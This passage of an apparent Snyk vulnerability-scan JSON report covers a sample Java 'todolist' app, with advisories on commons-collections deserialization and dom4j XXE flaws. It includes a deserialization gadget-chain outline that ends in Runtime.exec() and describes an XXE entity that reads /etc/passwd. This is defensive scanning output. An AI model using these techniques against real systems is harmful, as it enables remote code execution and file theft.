By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n", + "epssDetails": { + "percentile": "0.88407", + "probability": "0.01844", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-7501" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2016-12-25T16:51:56Z", + "functions_new": [ + { + "version": [ + "[3,3.2.2)" + ], + "functionId": { + "className": "org.apache.commons.collections.functors.InvokerTransformer", + "functionName": "transform" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2015-11-06T16:51:56Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2015-11-06T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:38.421377Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "commons-collections:commons-collections", + "version": "3.1", + "severityWithCritical": "critical" + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-472711", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,3.2.2)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.6, + "functions": [ + { + "version": [ + "[3.1, 3.22)", + "[,3.0-dev2)" + ], + "functionId": { + "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", + "className": "InvokerTransformer", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/commons-collections/pull/18", + "title": "GitHub PR" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:35.761152Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:34.698666Z" + }, + { + "type": 
"secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:35.761152Z" + } + ], + "description": "## Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. \r\n\r\nVersions of commons-collections from 3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n## PoC \r\n\r\n```\r\n/*\r\n\tGadget 
chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n## Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. 
However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. 
Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n## Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n", + "epssDetails": { + "percentile": "0.82603", + "probability": "0.00880", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-6420" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6hgm-866r-3cjv" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2019-10-10T18:31:03.943542Z", + "functions_new": [ + { + "version": [ + "[3.1, 3.22)", + "[,3.0-dev2)" + ], + "functionId": { + "className": "org.apache.commons.collections.functors.InvokerTransformer", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-10T00:00:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2020-02-24T00:00:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:35.761152Z", + "socialTrendAlert": false, + 
"packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "commons-collections:commons-collections", + "version": "3.1", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-6056408", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.0,3.2.2)" + ] + }, + "exploit": "High", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", + "title": "FoxGloveSecurity Blog" + }, + { + "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Issue" + }, + { + "url": "https://github.com/ianxtianxt/CVE-2015-7501", + "title": "PoC" + }, + { + "url": "https://www.exploit-db.com/exploits/46628", + "title": "Exploit DB" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:54:13.273677Z" + } + ], + "cvssSources": [ 
+ { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.088365Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:13.273677Z" + } + ], + "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-7501](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. 
Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n- [Exploit DB](https://www.exploit-db.com/exploits/46628)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", + "epssDetails": { + "percentile": "0.99663", + "probability": "0.96725", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-4852" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2023-11-14T13:41:26.946764Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-11-06T16:51:56Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2015-11-06T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.834525Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "commons-collections:commons-collections", + "version": "3.1", + "severityWithCritical": "critical" + }, + { + "id": "SNYK-JAVA-DOM4J-174153", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "credit": [ + "Mario Areias" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/Namespace.java", + "className": "Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/QName.java", + "className": "QName", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/dom4j/dom4j/issues/48", + "title": "GitHub Issue" + }, + { + "url": "https://ihacktoprotect.com/post/dom4j-xml-injection/", + "title": "POC: Ihacktoprotect Blog" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:00:55.789489Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. 
When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n", + "epssDetails": { + "percentile": "0.70906", + "probability": "0.00325", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-1000632" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-6pcc-3rfx-4gpm" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2019-04-10T16:07:04.634619Z", + "functions_new": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.QName", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-01T19:12:29Z", + "exploitDetails": { + "sources": [ + "Snyk" + 
], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2018-08-21T14:16:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.900402Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "dom4j:dom4j", + "version": "1.6.1", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-DOM4J-2812975", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.4, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/a822852", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + 
"cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:31.083245Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. 
When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n", + "epssDetails": { + "percentile": "0.79800", + "probability": "0.00664", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10683" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-hwj3-m3p6-hj38" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2022-05-10T12:56:27.582369Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-04-15T09:38:17Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2020-04-16T15:22:50Z", + 
"severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.985080Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "dom4j:dom4j", + "version": "1.6.1", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-JAVAXSERVLET-30449", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "credit": [ + "David Jorm" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "javax.servlet:jstl", + "references": [ + { + "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E", + "title": "Apache Mail Archive" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254", + "title": "NVD" + }, + { + "url": "https://access.redhat.com/security/cve/CVE-2015-0254", + "title": "RedHat CVE Database" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:45:52.623697Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", + "cvssV3BaseScore": 7.6, + "modificationTime": "2024-03-11T09:53:48.017447Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
